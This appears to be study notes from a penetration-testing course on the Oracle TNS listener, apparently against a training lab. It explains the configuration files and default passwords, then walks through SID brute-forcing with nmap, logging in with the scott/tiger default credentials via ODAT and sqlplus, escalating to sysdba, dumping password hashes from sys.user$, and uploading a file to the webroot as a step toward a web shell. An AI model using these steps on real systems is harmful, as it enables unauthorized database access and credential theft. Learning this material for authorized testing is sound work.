Oracle TNS

Oracle TNS: Oracle Transparent Network Substrate

A protocol that facilitates comm bet Oracle DB's/apps over networks
TNS supports various protocols bet client apps, such as IPX/SPX and TCP/IP protocol stacks
- It has become a solution for large, complex db's healthcare, finance, and retail industries
- Its built-in encryption mechanism ensures the sec of data transmitted
  - Ideal solution for enterprise envs where data sec is paramount
  - TNS now has support IPv6/SSL/TLS encryption which makes suitable for the following:
    Name resolution, Connection management, Load balancing, Security Default Config
Default: The listener listens for incoming connections on port 1521
The TNS listener is config to support TCP/IP, UDP, IPX/SPX, and AppleTalk
Can support multiple network ints and listen on specific IP's
Default: Can be remotely managed in Oracle 8i/9i but not in 10g/11g

Security features of the listener:

Will only accept connections from auth hosts/basic auth using hostnames/IP's, usernames/passwds
Will use Oracle Net Services to encrypt comm bet client/server
Config files for Oracle TNS are called tnsnames.ora/listener.ora
- Typically located in $ORACLE_HOME/network/admin dir
- The plain text file contains config info for Oracle db instances/network services that use TNS TNS: Used with other services like DBSNMP, DB's, App Server, Enterprise Manager, Fusion Middleware, etc...
Oracle 9 has a default passwd, CHANGE_ON_INSTALL
Oracle 10 has no default password set
Oracle DBSNMP service also uses a default password, dbsnmp
Many orgs use finger with Oracle, which can put it at risk/make it vuln when we have the home dir Tnsnames.ora

ORCL =
  (DESCRIPTION =
    (ADDRESS_LIST =
      (ADDRESS = (PROTOCOL = TCP)(HOST = 10.129.11.102)(PORT = 1521))
    )
    (CONNECT_DATA =
      (SERVER = DEDICATED)
      (SERVICE_NAME = orcl)
    )
  )

We can see a service called ORCL, which is listening on port 1521 on IP 10.129.11.102
Clients should use the service name orcl when connecting
Entries can also include additional info, auth details, pooling settings, load balancing config

listener.ora file is server-side config file that defines the listener process's properties and params

Responsible for receiving incoming client requests/fwding to appropriate Oracle db instance Listener.ora

SID_LIST_LISTENER =
  (SID_LIST =
    (SID_DESC =
      (SID_NAME = PDB1)
      (ORACLE_HOME = C:\oracle\product\19.0.0\dbhome_1)
      (GLOBAL_DBNAME = PDB1)
      (SID_DIRECTORY_LIST =
        (SID_DIRECTORY =
          (DIRECTORY_TYPE = TNS_ADMIN)
          (DIRECTORY = C:\oracle\product\19.0.0\dbhome_1\network\admin)
        )
      )
    )
  )

LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = orcl.inlanefreight.htb)(PORT = 1521))
      (ADDRESS = (PROTOCOL = IPC)(KEY = EXTPROC1521))
    )
  )

ADR_BASE_LISTENER = C:\oracle

Oracle Net Services software uses tnsnames.ora to resolve service names to network addresses
Listener process uses listener.ora to determine services it should listen to/behavior of the listener

Oracle db's can be protected by using PlsqlExclusionList: PL/SQL Exclusion List

User-created txt file that needs to be placed in $ORACLE_HOME/sqldeveloper dir
Contains the names of PL/SQL packages/types that should be excluded from exec
Once PL/SQL Exclusion List is created: It can be loaded into the db instance
- It serves as a blacklist that can't be accessed through the Oracle App Server

connect_data # attributes of connection, service name, sid, protocol, db instance id
instance_name # name of db instance client
service_name # name of service client wants to connect to 
security # security type for connections
connect_timeout # time limit in seconds for client to establish a connection to db
receive_timeout # time limit in seconds for client to receive a response from db
send_timeout # time limit in seconds for client to send request to db
sqlnet.expire_time # time limit in seconds for client to detect connection failed
trace_level # tracing for db connection
trace_directory # dir where trace files stored
trace_file_name # name of trace file
log_file # log info

Before we can enumerate the TNS listener and interact with it, we need to download a few packages and tools for our Pwnbox instance in case it does not have these already.

# oracle-tools-setup.sh 

#!/bin/bash
sudo apt-get install libaio1 python3-dev alien -y 
git clone https://github.com/quentinhardy/odat.git 
git submodule init git submodule update 
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-basic-linux.x64-21.12.0.0.0dbru.zip 
unzip instantclient-basic-linux.x64-21.12.0.0.0dbru.zip 
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip 
unzip instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip 

export LD_LIBRARY_PATH=instantclient_21_12:$LD_LIBRARY_PATH 
export PATH=$LD_LIBRARY_PATH:$PATH 

pip3 install cx_Oracle 
sudo apt-get install python3-scapy -y 
sudo pip3 install colorlog termcolor pycrypto passlib python-libnmap 
sudo pip3 install argcomplete && sudo activate-global-python-argcomplete

./odat.py -h
usage: odat.py [-h] [--version]
            _  __   _  ___ 
           / \|  \ / \|_ _|
          ( o ) o ) o || | 
           \_/|__/|_n_||_| 
-------------------------------------------
  _        __           _           ___ 
 / \      |  \         / \         |_ _|
( o )       o )         o |         | | 
 \_/racle |__/atabase |_n_|ttacking |_|ool 
-------------------------------------------

ODAT: Oracle DB Attacking Tool:

Open-source pentesting tool written in Python/designed to enum/exploit vulns
Can be used to id, exploit, including SQLi, RCE, and privesc

sudo nmap -p1521 -sV 10.129.204.235 --open
1521/tcp open  oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)

In Oracle RDBMS, a SID: System Id is a unique name that id's a particular db instance
It can have multiple instances, each with its own SID
Instance: A set of procs/mem structures that interact to manage the db's data
When a client connects to an Oracle db, it specifies the SID, with its connection str
The client uses this SID to id which db instance it wants to connect to
If not specified: The default value defined in the tnsnames.ora file is used

The SIDs are an essential part of the connection process, as it identifies the specific instance of the database the client wants to connect to. If the client specifies an incorrect SID, the connection attempt will fail. Database administrators can use the SID to monitor and manage the individual instances of a database. For example, they can start, stop, or restart an instance, adjust its memory allocation or other configuration parameters, and monitor its performance using tools like Oracle Enterprise Manager.

There are various ways to enumerate, or better said, guess SIDs. Therefore we can use tools like nmap, hydra, odat, and others. Let us use nmap first.

Nmap - SID Bruteforcing

sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-brute
1521/tcp open  oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
| oracle-sid-brute: 
|_  XE

We can use odat.py to perform a variety of scans to for info about Oracle db services/components
Scans can retrieve db names, ver, running procs, user accts, vulns, misconfigs, etc. ODAT

./odat.py all -s 10.129.204.235

In this example, we found valid creds for scott and his password tiger
Now we can use the tool sqlplus to connect to the Oracle db/interact with it SQLplus - Log In

sqlplus scott/tiger@10.129.204.235/XE

SQL*Plus: Release 21.0.0.0.0 - Production on Mon Mar 6 11:19:21 2023 
Version 21.4.0.0.0
Copyright (c) 1982, 2021, Oracle. All rights reserved.
SQL>

If you come across the following error: sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory, please exec below, taken from here

sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig

Many SQLplus cmds that we can use to enum the db manually
We can list all available tables in the current db/show us privs of the current user: Oracle RDBMS - Interaction

SQL> select table_name from all_tables;

TABLE_NAME
------------------------------
DUAL
SYSTEM_PRIVILEGE_MAP

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT                          CONNECT                        NO  YES NO
SCOTT                          RESOURCE                       NO  YES NO

scott has no admin privs
We can try using this acct to log in as Sys Db Admin (sysdba), giving us higher privs Oracle RDBMS - Db Enum

sqlplus scott/tiger@10.129.204.235/XE as sysdba
SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS                            ADM_PARALLEL_EXECUTE_TASK      YES YES NO
USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS                            DELETE_CATALOG_ROLE            YES YES NO
SYS                            EXECUTE_CATALOG_ROLE           YES YES NO

SQL> select name, password from sys.user$;
# we can retrieve password hashes from sys.user$ and try to crack them offline

Another option is to upload a web shell to target Default Paths:
- Linux: /var/www/html|| Windows: C:\inetpub\wwwroot

# oracle RDBMS - file upload 
echo "oracle file upload test" > testing.txt
./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt

We can test if the file upload worked with curl
We will use a GET http://<IP> request, or we can visit via browser

curl -X GET http://10.129.204.235/testing.txt # oracle file UL test

PreviousMySQL/MSSQL NextCPTS Machines

Last updated 8 months ago